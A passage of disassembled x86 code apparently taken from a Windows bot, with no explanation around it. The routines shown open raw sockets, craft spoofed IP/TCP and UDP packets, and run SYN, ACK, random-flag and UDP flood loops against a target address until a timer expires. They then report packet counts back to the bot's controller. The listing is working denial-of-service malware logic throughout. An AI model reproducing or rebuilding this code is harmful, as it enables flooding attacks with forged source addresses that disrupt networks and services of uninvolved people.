call dword_444260 ; htons
mov [ebp+70h+var_22], ax
mov [ebp+70h+var_1C], bl
call _rand
cdq
push 0Eh
pop ecx
idiv ecx
push 14h
mov al, byte ptr [ebp+edx*4+70h+var_88]
mov [ebp+70h+var_1B], al
mov eax, [ebp+70h+var_C]
mov [ebp+70h+var_18], eax
mov eax, [ebp+70h+arg_0]
mov [ebp+70h+var_14], eax
lea eax, [ebp+70h+Src]
push eax
call sub_402422
mov [ebp+70h+var_1A], ax
push 14h ; Size
lea eax, [ebp+70h+Src]
push eax ; Src
push [ebp+70h+Dst] ; Dst
call _memcpy
add esp, 14h
push 10h
lea eax, [ebp+70h+var_98]
push eax
push 0
push esi
push [ebp+70h+Dst]
push [ebp+70h+var_4]
call dword_4440CC ; sendto
loc_416A4A: ; CODE XREF: sub_416871+10E�j
call edi ; GetTickCount
sub eax, [ebp+70h+var_10]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+70h+arg_4]
jbe loc_416984
push [ebp+70h+Dst] ; Memory
call _free
pop ecx
push [ebp+70h+var_4]
call dword_444218 ; closesocket
pop edi
xor eax, eax
pop esi
inc eax
pop ebx
add ebp, 70h
leave
retn
sub_416871 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_416A7E proc near ; DATA XREF: sub_40274D+6A89�o
Dest = byte ptr -394h
var_194 = dword ptr -194h
var_190 = byte ptr -190h
Str = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 394h
mov eax, [ebp+arg_0]
push esi
push edi
push 65h
mov esi, eax
pop ecx
lea edi, [ebp+var_194]
rep movsd
mov dword ptr [eax+190h], 1
lea eax, [ebp+Str]
push eax ; Str
call j__atol
pop ecx
push eax
lea eax, [ebp+var_190]
push eax
call dword_44417C ; inet_addr
push eax
call sub_416871
push eax
lea eax, [ebp+Dest]
push offset asc_43591C ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 14h
cmp [ebp+var_8], esi
jnz short loc_416B00
push esi ; int
push [ebp+var_C] ; int
lea eax, [ebp+Dest]
push eax ; int
lea eax, [ebp+var_90]
push eax ; Str
push [ebp+var_194] ; int
call sub_40123B
add esp, 14h
loc_416B00: ; CODE XREF: sub_416A7E+60�j
lea eax, [ebp+Dest]
push eax
call sub_417D70
push [ebp+var_10]
call sub_40B149
pop ecx
pop ecx
push esi
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_416A7E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame fpd=74h
sub_416B1E proc near ; DATA XREF: sub_40274D+512E�o
Dest = byte ptr -440h
var_240 = dword ptr -240h
var_23C = byte ptr -23Ch
Str = byte ptr -1BCh
var_13C = byte ptr -13Ch
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A0 = byte ptr -0A0h
var_9F = byte ptr -9Fh
var_8C = byte ptr -8Ch
var_80 = byte ptr -80h
var_78 = byte ptr -78h
Src = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = word ptr -5Ah
Dst = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 440h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+74h+var_240]
rep movsd
xor esi, esi
inc esi
mov [eax+19Ch], esi
push 0Eh
xor eax, eax
xor ebx, ebx
mov [ebp+74h+var_A0], bl
pop ecx
lea edi, [ebp+74h+var_9F]
rep stosd
stosw
stosb
mov edi, ds:dword_42B038
call edi ; GetTickCount
push eax
call sub_41ECD4
pop ecx
push 0FFh
push 3
push 2
call dword_444100 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+74h+var_4], eax
jnz short loc_416BA6
call dword_4441C4 ; WSAGetLastError
push eax
push offset asc_435A38 ; "-"
loc_416B89: ; CODE XREF: sub_416B1E+AC�j
lea eax, [ebp+74h+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_416B98: ; CODE XREF: sub_416B1E+D3�j
; sub_416B1E+3EE�j
cmp [ebp+74h+var_A8], ebx
jnz loc_416EBC
jmp loc_416E9C
; ---------------------------------------------------------------------------
loc_416BA6: ; CODE XREF: sub_416B1E+5D�j
push 4
lea ecx, [ebp+74h+var_34]
push ecx
push 2
push ebx
push eax
mov [ebp+74h+var_34], esi
call dword_444120 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_416BCC
call dword_4441C4 ; WSAGetLastError
push eax
push offset unk_435A00
jmp short loc_416B89
; ---------------------------------------------------------------------------
loc_416BCC: ; CODE XREF: sub_416B1E+9E�j
lea eax, [ebp+74h+var_23C]
push eax
call dword_44417C ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_416BF3
lea eax, [ebp+74h+Dest]
push offset asc_4359E0 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_416B98
; ---------------------------------------------------------------------------
loc_416BF3: ; CODE XREF: sub_416B1E+BE�j
push 10h ; Size
lea eax, [ebp+74h+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push ebx
mov [ebp+74h+Dst], 2
call dword_444260 ; htons
mov [ebp+74h+var_42], ax
lea eax, [ebp+74h+var_23C]
push eax
call dword_44417C ; inet_addr
mov [ebp+74h+var_40], eax
mov [ebp+74h+arg_0], ebx
call edi ; GetTickCount
mov [ebp+74h+var_30], eax
jmp loc_416E3D
; ---------------------------------------------------------------------------
loc_416C30: ; CODE XREF: sub_416B1E+330�j
push 28h
mov [ebp+74h+var_2C], 45h
call dword_444260 ; htons
cmp [ebp+74h+var_B0], ebx
mov [ebp+74h+var_2A], ax
mov [ebp+74h+var_28], si
mov [ebp+74h+var_26], bx
mov [ebp+74h+var_24], 80h
mov [ebp+74h+var_23], 6
mov [ebp+74h+var_22], bx
jz short loc_416C86
call _rand
mov esi, eax
shl esi, 8
call _rand
add esi, eax
shl esi, 8
call _rand
add esi, eax
shl esi, 8
call _rand
add esi, eax
mov [ebp+74h+var_20], esi
xor esi, esi
inc esi
jmp short loc_416C9C
; ---------------------------------------------------------------------------
loc_416C86: ; CODE XREF: sub_416B1E+139�j
push [ebp+74h+var_240]
call sub_4023C9
pop ecx
push eax
call dword_44417C ; inet_addr
mov [ebp+74h+var_20], eax
loc_416C9C: ; CODE XREF: sub_416B1E+166�j
cmp [ebp+74h+var_B8], ebx
mov eax, [ebp+74h+var_40]
mov [ebp+74h+var_1C], eax
jnz short loc_416CB7
call _rand
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_416CBA
; ---------------------------------------------------------------------------
loc_416CB7: ; CODE XREF: sub_416B1E+187�j
push [ebp+74h+var_B8]
loc_416CBA: ; CODE XREF: sub_416B1E+197�j
call dword_444260 ; htons
mov [ebp+74h+var_16], ax
call _rand
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_444260 ; htons
push 12345678h
mov [ebp+74h+var_18], ax
call dword_444234 ; htonl
mov [ebp+74h+var_14], eax
lea eax, [ebp+74h+Str]
push offset aSyn ; "syn"
push eax ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_416D0A
mov [ebp+74h+var_10], ebx
mov [ebp+74h+var_B], 2
jmp short loc_416D66
; ---------------------------------------------------------------------------
loc_416D0A: ; CODE XREF: sub_416B1E+1E1�j
lea eax, [ebp+74h+Str]
push offset aAck ; "ack"
push eax ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_416D2A
mov [ebp+74h+var_10], ebx
mov [ebp+74h+var_B], 10h
jmp short loc_416D66
; ---------------------------------------------------------------------------
loc_416D2A: ; CODE XREF: sub_416B1E+201�j
lea eax, [ebp+74h+Str]
push offset aRandom_0 ; "random"
push eax ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_416D66
call _rand
cdq
push 3
pop ecx
idiv ecx
mov [ebp+74h+var_10], edx
call _rand
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+74h+var_B], dl
loc_416D66: ; CODE XREF: sub_416B1E+1EA�j
; sub_416B1E+20A�j ...
push 200h
mov [ebp+74h+var_C], 50h
call dword_444260 ; htons
mov [ebp+74h+var_A], ax
mov eax, [ebp+74h+var_20]
mov [ebp+74h+Src], eax
mov eax, [ebp+74h+var_1C]
push 14h
mov [ebp+74h+var_6], bx
mov [ebp+74h+var_8], bx
mov [ebp+74h+var_60], eax
mov [ebp+74h+var_5C], bl
mov [ebp+74h+var_5B], 6
call dword_444260 ; htons
mov [ebp+74h+var_5A], ax
push 20h ; Size
lea eax, [ebp+74h+Src]
push eax ; Src
lea eax, [ebp+74h+var_A0]
push eax ; Dst
call _memcpy
push 14h ; Size
lea eax, [ebp+74h+var_18]
push eax ; Src
lea eax, [ebp+74h+var_80]
push eax ; Dst
call _memcpy
lea eax, [ebp+74h+var_A0]
push 34h
push eax
call sub_402422
mov [ebp+74h+var_8], ax
push 14h ; Size
lea eax, [ebp+74h+var_2C]
push eax ; Src
lea eax, [ebp+74h+var_A0]
push eax ; Dst
call _memcpy
push 14h ; Size
lea eax, [ebp+74h+var_18]
push eax ; Src
lea eax, [ebp+74h+var_8C]
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+74h+var_78]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 44h
lea eax, [ebp+74h+var_A0]
push 28h
push eax
call sub_402422
mov [ebp+74h+var_22], ax
push 14h ; Size
lea eax, [ebp+74h+var_2C]
push eax ; Src
lea eax, [ebp+74h+var_A0]
push eax ; Dst
call _memcpy
add esp, 14h
push 10h
lea eax, [ebp+74h+Dst]
push eax
push ebx
push 3Ch
lea eax, [ebp+74h+var_A0]
push eax
push [ebp+74h+var_4]
call dword_4440CC ; sendto
cmp eax, 0FFFFFFFFh
jz loc_416ED9
inc [ebp+74h+arg_0]
loc_416E3D: ; CODE XREF: sub_416B1E+10D�j
call edi ; GetTickCount
sub eax, [ebp+74h+var_30]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+74h+var_B4]
jbe loc_416C30
push [ebp+74h+var_4]
call dword_444218 ; closesocket
mov eax, [ebp+74h+arg_0]
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
xor edx, edx
div [ebp+74h+var_B4]
shr ecx, 14h
push ecx
push eax
push [ebp+74h+arg_0]
lea eax, [ebp+74h+var_23C]
push eax
lea eax, [ebp+74h+Str]
push eax
lea eax, [ebp+74h+Dest]
push offset asc_435990 ; "-"
push eax ; Dest
call _sprintf
add esp, 1Ch
cmp [ebp+74h+var_A8], ebx
jnz short loc_416EBC
loc_416E9C: ; CODE XREF: sub_416B1E+83�j
push ebx ; int
push [ebp+74h+var_AC] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+var_13C]
push eax ; Str
push [ebp+74h+var_240] ; int
call sub_40123B
add esp, 14h
loc_416EBC: ; CODE XREF: sub_416B1E+7D�j
; sub_416B1E+37C�j
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
push [ebp+74h+var_BC]
call sub_40B149
pop ecx
pop ecx
push ebx
call ds:dword_42B068 ; ExitThread
loc_416ED9: ; CODE XREF: sub_416B1E+316�j
push [ebp+74h+var_4]
call dword_444218 ; closesocket
call dword_4441C4 ; WSAGetLastError
push eax
push [ebp+74h+arg_0]
lea eax, [ebp+74h+var_23C]
push eax
push offset asc_435940 ; "-"
lea eax, [ebp+74h+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 18h
jmp loc_416B98
sub_416B1E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416F11 proc near ; CODE XREF: sub_416F65+19A�p
; sub_416F65+207�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
mov edx, [ebp+arg_0]
push esi
xor esi, esi
cmp ecx, 1
mov [ebp+arg_4], esi
jle short loc_416F3F
lea eax, [ecx-2]
shr eax, 1
inc eax
push edi
lea edi, [eax+eax]
sub ecx, edi
loc_416F31: ; CODE XREF: sub_416F11+28�j
movzx edi, word ptr [edx]
add esi, edi
inc edx
inc edx
dec eax
jnz short loc_416F31
pop edi
cmp ecx, 1
loc_416F3F: ; CODE XREF: sub_416F11+12�j
jnz short loc_416F4C
mov al, [edx]
mov byte ptr [ebp+arg_4], al
movzx eax, word ptr [ebp+arg_4]
add esi, eax
loc_416F4C: ; CODE XREF: sub_416F11:loc_416F3F�j
mov ecx, esi
and esi, 0FFFFh
sar ecx, 10h
add ecx, esi
mov eax, ecx
sar eax, 10h
add eax, ecx
not eax
pop esi
pop ebp
retn
sub_416F11 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416F65 proc near ; CODE XREF: sub_4171BC+54�p
var_D0 = dword ptr -0D0h
Dest = byte ptr -0C8h
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = byte ptr -0A0h
var_9F = byte ptr -9Fh
var_9E = word ptr -9Eh
Src = byte ptr -9Ch
var_88 = byte ptr -88h
var_74 = word ptr -74h
var_72 = word ptr -72h
var_70 = dword ptr -70h
var_64 = byte ptr -64h
var_60 = byte ptr -60h
var_5F = byte ptr -5Fh
var_5E = byte ptr -5Eh
var_54 = dword ptr -54h
var_50 = byte ptr -50h
var_4E = word ptr -4Eh
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = byte ptr -48h
var_47 = byte ptr -47h
var_46 = word ptr -46h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = word ptr -3Ch
var_3A = word ptr -3Ah
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
Dst = byte ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_194 = dword ptr 19Ch
arg_198 = dword ptr 1A0h
push ebp
mov ebp, esp
sub esp, 0C8h
and [ebp+var_4], 0
push esi
mov esi, ds:dword_42B038
call esi ; GetTickCount
push 0FFh
push 3
push 2
mov [ebp+var_C], eax
call dword_444100 ; socket
mov [ebp+var_8], eax
call esi ; GetTickCount
push eax ; Size
call sub_41ECD4
mov [esp+0D0h+var_D0], 578h
push 9
push 1
call sub_41B325
pop ecx
pop ecx
push eax ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
call esi ; GetTickCount
sub eax, [ebp+var_C]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_198]
ja loc_4171AD
push ebx
push edi
mov edi, 5A0h
loc_416FD8: ; CODE XREF: sub_416F65+240�j
cmp dword_4D5898, 0
jnz short loc_417039
push 10h
pop eax
push eax ; Size
mov [ebp+var_10], eax
lea eax, [ebp+var_64]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_64]
push eax
push [ebp+arg_0]
call dword_444068 ; getsockname
push 0FFh
push 1
call sub_41B325
push eax
movzx eax, [ebp+var_5E]
push eax
movzx eax, [ebp+var_5F]
push eax
movzx eax, [ebp+var_60]
push eax
lea eax, [ebp+Dest]
push offset aD_D_D_D ; "%d.%d.%d.%d"
push eax ; Dest
call _sprintf
add esp, 20h
jmp short loc_41704C
; ---------------------------------------------------------------------------
loc_417039: ; CODE XREF: sub_416F65+7A�j
lea eax, [ebp+Dest]
push offset byte_4D5698 ; Source
push eax ; Dest
call _strcpy
pop ecx
pop ecx
loc_41704C: ; CODE XREF: sub_416F65+D2�j
lea eax, [ebp+Dest]
push eax
call dword_44417C ; inet_addr
mov ebx, eax
mov eax, [ebp+var_54]
and eax, 0FFFFFF45h
or eax, 45h
push edi
mov [ebp+var_54], eax
mov [ebp+var_50], 10h
call dword_444260 ; htons
mov [ebp+var_4E], ax
call _rand
and [ebp+var_46], 0
mov [ebp+var_4C], ax
mov eax, [ebp+arg_194]
mov [ebp+var_4A], 40h
mov [ebp+var_48], 40h
mov [ebp+var_47], 6
mov [ebp+var_44], ebx
mov [ebp+var_40], eax
call _rand
mov [ebp+var_3C], ax
call _rand
mov [ebp+var_3A], ax
call _rand
mov [ebp+var_38], eax
call _rand
mov ebx, [ebp+var_40]
and [ebp+var_2A], 0
and [ebp+var_28], 0
mov [ebp+var_34], eax
mov eax, [ebp+var_30]
and ax, 0FF50h
or ax, 50h
mov word ptr [ebp+var_30], ax
mov ax, [ebp+var_3A]
mov [ebp+var_72], ax
lea eax, [ebp+var_54]
push 14h
push eax
mov byte ptr [ebp+var_30+2], 18h
mov [ebp+var_2C], 787Dh
mov [ebp+var_74], 2
mov [ebp+var_70], ebx
call sub_416F11
pop ecx
pop ecx
mov [ebp+var_46], ax
mov eax, [ebp+var_44]
push 58Ch
mov [ebp+var_A8], eax
mov [ebp+var_A4], ebx
mov [ebp+var_A0], 0
mov [ebp+var_9F], 6
call ds:dword_42B200 ; htons
mov [ebp+var_9E], ax
push 14h ; Size
lea eax, [ebp+Src]
push eax ; Src
lea eax, [ebp+var_3C]
push eax ; Dst
call _memcpy
push 578h ; Size
lea eax, [ebp+var_88]
push eax ; Src
lea eax, [ebp+Dst]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_A8]
push 598h
push eax
call sub_416F11
add esp, 20h
mov [ebp+var_2A], ax
push 10h
lea eax, [ebp+var_74]
push eax
push 0
push edi
lea eax, [ebp+var_54]
push eax
push [ebp+var_8]
call dword_4440CC ; sendto
inc [ebp+var_4]
call esi ; GetTickCount
sub eax, [ebp+var_C]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_198]
jbe loc_416FD8
pop edi
pop ebx
loc_4171AD: ; CODE XREF: sub_416F65+66�j
push [ebp+var_8]
call dword_444218 ; closesocket
mov eax, [ebp+var_4]
pop esi
leave
retn
sub_416F65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4171BC proc near ; DATA XREF: sub_40274D+69BB�o
Dest = byte ptr -394h
var_194 = dword ptr -194h
var_190 = byte ptr -190h
Str = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 394h
mov eax, [ebp+arg_0]
push esi
push edi
push 65h
mov esi, eax
pop ecx
lea edi, [ebp+var_194]
rep movsd
mov dword ptr [eax+190h], 1
lea eax, [ebp+Str]
push eax ; Str
call j__atol
pop ecx
push eax
lea eax, [ebp+var_190]
push eax
call dword_44417C ; inet_addr
push eax
sub esp, 194h
push 65h
pop ecx
lea esi, [ebp+var_194]
mov edi, esp
rep movsd
call sub_416F65
push eax
lea eax, [ebp+Dest]
push offset asc_435A6C ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 1A8h
cmp [ebp+var_8], esi
jnz short loc_417254
push esi ; int
push [ebp+var_C] ; int
lea eax, [ebp+Dest]
push eax ; int
lea eax, [ebp+var_90]
push eax ; Str
push [ebp+var_194] ; int
call sub_40123B
add esp, 14h
loc_417254: ; CODE XREF: sub_4171BC+76�j
lea eax, [ebp+Dest]
push eax
call sub_417D70
push [ebp+var_10]
call sub_40B149
pop ecx
pop ecx
push esi
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_4171BC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_417272(int,char,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,char,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,char Str,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,char,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int)
sub_417272 proc near ; CODE XREF: sub_4175F3+3B�p
Dest = byte ptr -254h
var_54 = byte ptr -54h
Dst = byte ptr -34h
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_2E = byte ptr -2Eh
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_84 = byte ptr 8Ch
Str = byte ptr 10Ch
arg_184 = byte ptr 18Ch
arg_208 = dword ptr 210h
arg_20C = dword ptr 214h
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push edi
mov ebx, 0FFh
push ebx
push 3
push 2
call dword_444100 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jnz short loc_4172AC
lea eax, [ebp+Dest]
push offset asc_435C58 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
xor edi, edi
jmp short loc_417302
; ---------------------------------------------------------------------------
loc_4172AC: ; CODE XREF: sub_417272+21�j
push 4
lea ecx, [ebp+var_14]
push ecx
push 2
xor edi, edi
push edi
push eax
mov [ebp+var_14], 1
call dword_444120 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_4172D8
call dword_4441C4 ; WSAGetLastError
push eax
push offset unk_435C08
jmp short loc_4172F3
; ---------------------------------------------------------------------------
loc_4172D8: ; CODE XREF: sub_417272+56�j
lea eax, [ebp+arg_4]
push eax
call dword_44417C ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_417333
call dword_4441C4 ; WSAGetLastError
push eax
push offset asc_435BC0 ; "-"
loc_4172F3: ; CODE XREF: sub_417272+64�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_417302: ; CODE XREF: sub_417272+38�j
cmp [ebp+arg_20C], edi
jnz loc_4175C8
push edi ; int
push [ebp+arg_208] ; int
lea eax, [ebp+Dest]
push eax ; int
lea eax, [ebp+arg_184]
push eax ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 14h
jmp loc_4175C8
; ---------------------------------------------------------------------------
loc_417333: ; CODE XREF: sub_417272+73�j
push esi
push edi
mov [ebp+var_24], 2
call dword_444260 ; htons
mov [ebp+var_22], ax
lea eax, [ebp+arg_4]
push eax
call ds:dword_42B218 ; inet_addr
mov esi, ds:dword_42B038
mov [ebp+var_20], eax
call esi ; GetTickCount
mov [ebp+var_8], eax
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+Dest]
push offset asc_435B94 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+arg_20C], edi
jnz short loc_41739D
push edi ; int
push [ebp+arg_208] ; int
lea eax, [ebp+Dest]
push eax ; int
lea eax, [ebp+arg_184]
push eax ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 14h
loc_41739D: ; CODE XREF: sub_417272+109�j
mov [ebp+var_4], edi
call esi ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, eax
lea eax, [ebp+Str]
push eax ; Str
call j__atol
cmp esi, eax
pop ecx
ja loc_417556
mov esi, 41Ch
jmp short loc_4173D1
; ---------------------------------------------------------------------------
loc_4173CC: ; CODE XREF: sub_417272+2DE�j
mov ebx, 0FFh
loc_4173D1: ; CODE XREF: sub_417272+158�j
cmp dword_4D5898, edi
jnz short loc_417429
push 10h
pop eax
push eax ; Size
mov [ebp+var_10], eax
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+Dst]
push eax
push [ebp+arg_0]
call dword_444068 ; getsockname
push ebx
push 1
call sub_41B325
push eax
movzx eax, [ebp+var_2E]
push eax
movzx eax, [ebp+var_2F]
push eax
movzx eax, [ebp+var_30]
push eax
lea eax, [ebp+var_54]
push offset aD_D_D_D ; "%d.%d.%d.%d"
push eax ; Dest
call _sprintf
add esp, 20h
jmp short loc_417439
; ---------------------------------------------------------------------------
loc_417429: ; CODE XREF: sub_417272+165�j
lea eax, [ebp+var_54]
push offset byte_4D5698 ; Source
push eax ; Dest
call _strcpy
pop ecx
pop ecx
loc_417439: ; CODE XREF: sub_417272+1B5�j
push esi
mov byte_4D58A0, 45h
call dword_444260 ; htons
mov word_4D58A2, ax
lea eax, [ebp+var_54]
push eax
mov word_4D58A4, 1
mov word_4D58A6, di
mov byte_4D58A8, 80h
mov byte_4D58A9, 11h
mov word_4D58AA, di
call dword_44417C ; inet_addr
mov dword_4D58AC, eax
mov eax, [ebp+var_20]
mov dword_4D58B0, eax
lea eax, [ebp+arg_84]
push eax ; Str
mov word_4D58BA, di
call j__atol
test eax, eax
pop ecx
jnz short loc_4174B1
call _rand
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_4174BF
; ---------------------------------------------------------------------------
loc_4174B1: ; CODE XREF: sub_417272+22D�j
lea eax, [ebp+arg_84]
push eax ; Str
call j__atol
pop ecx
push eax
loc_4174BF: ; CODE XREF: sub_417272+23D�j
call dword_444260 ; htons
mov word_4D58B6, ax
call _rand
cdq
mov ecx, 401h
idiv ecx
push 408h
mov word_4D58B4, dx
call dword_444260 ; htons
push 400h ; Size
mov word_4D58B8, ax
call _rand
cdq
idiv ebx
push edx ; Val
push offset dword_4D58BC ; Dst
call _memset
add esp, 0Ch
push 10h
lea eax, [ebp+var_24]
push eax
push edi
push esi
push offset byte_4D58A0
push [ebp+var_C]
call dword_4440CC ; sendto
cmp eax, 0FFFFFFFFh
jz loc_4175CE
inc [ebp+var_4]
call ds:dword_42B038 ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, eax
lea eax, [ebp+Str]
push eax ; Str
call j__atol
cmp ebx, eax
pop ecx
jbe loc_4173CC
loc_417556: ; CODE XREF: sub_417272+14D�j
push [ebp+var_C]
call dword_444218 ; closesocket
mov esi, [ebp+var_4]
lea eax, [ebp+Str]
imul esi, 41Ch
push eax ; Str
call j__atol
mov ecx, eax
mov eax, esi
shr eax, 0Ah
xor edx, edx
div ecx
shr esi, 14h
push eax
push esi
push [ebp+var_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+Dest]
push offset asc_435B30 ; "-"
push eax ; Dest
call _sprintf
add esp, 1Ch
loc_41759F: ; CODE XREF: sub_417272+37F�j
cmp [ebp+arg_20C], edi
jnz short loc_4175C7
push edi ; int
push [ebp+arg_208] ; int
lea eax, [ebp+Dest]
push eax ; int
lea eax, [ebp+arg_184]
push eax ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 14h
loc_4175C7: ; CODE XREF: sub_417272+333�j
pop esi
loc_4175C8: ; CODE XREF: sub_417272+96�j
; sub_417272+BC�j
pop edi
xor eax, eax
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4175CE: ; CODE XREF: sub_417272+2B2�j
push [ebp+var_4]
push esi
call dword_4441C4 ; WSAGetLastError
push eax
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+Dest]
push offset asc_435AA0 ; "-"
push eax ; Dest
call _sprintf
add esp, 18h
jmp short loc_41759F
sub_417272 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4175F3 proc near ; DATA XREF: sub_40274D+4A49�o
Dest = byte ptr -414h
var_214 = byte ptr -214h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov edx, [ebp+arg_0]
push esi
push edi
mov eax, 85h
mov ecx, eax
mov esi, edx
lea edi, [ebp+var_214]
rep movsd
sub esp, 214h
mov ecx, eax
lea esi, [ebp+var_214]
mov edi, esp
mov dword ptr [edx+210h], 1
rep movsd
call sub_417272
push eax
lea eax, [ebp+Dest]
push offset asc_435C84 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
add esp, 220h
push eax
call sub_417D70
push [ebp+var_10]
call sub_40B149
pop ecx
pop ecx
push 0
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_4175F3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41766A proc near ; CODE XREF: sub_41776E+289�p
arg_0 = dword ptr 4
push 0FFFEh
push 1
call sub_41B325
pop ecx
pop ecx
mov ecx, [esp+arg_0]
shl eax, 10h
and ecx, 0FFFFh
or eax, ecx
retn
sub_41766A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
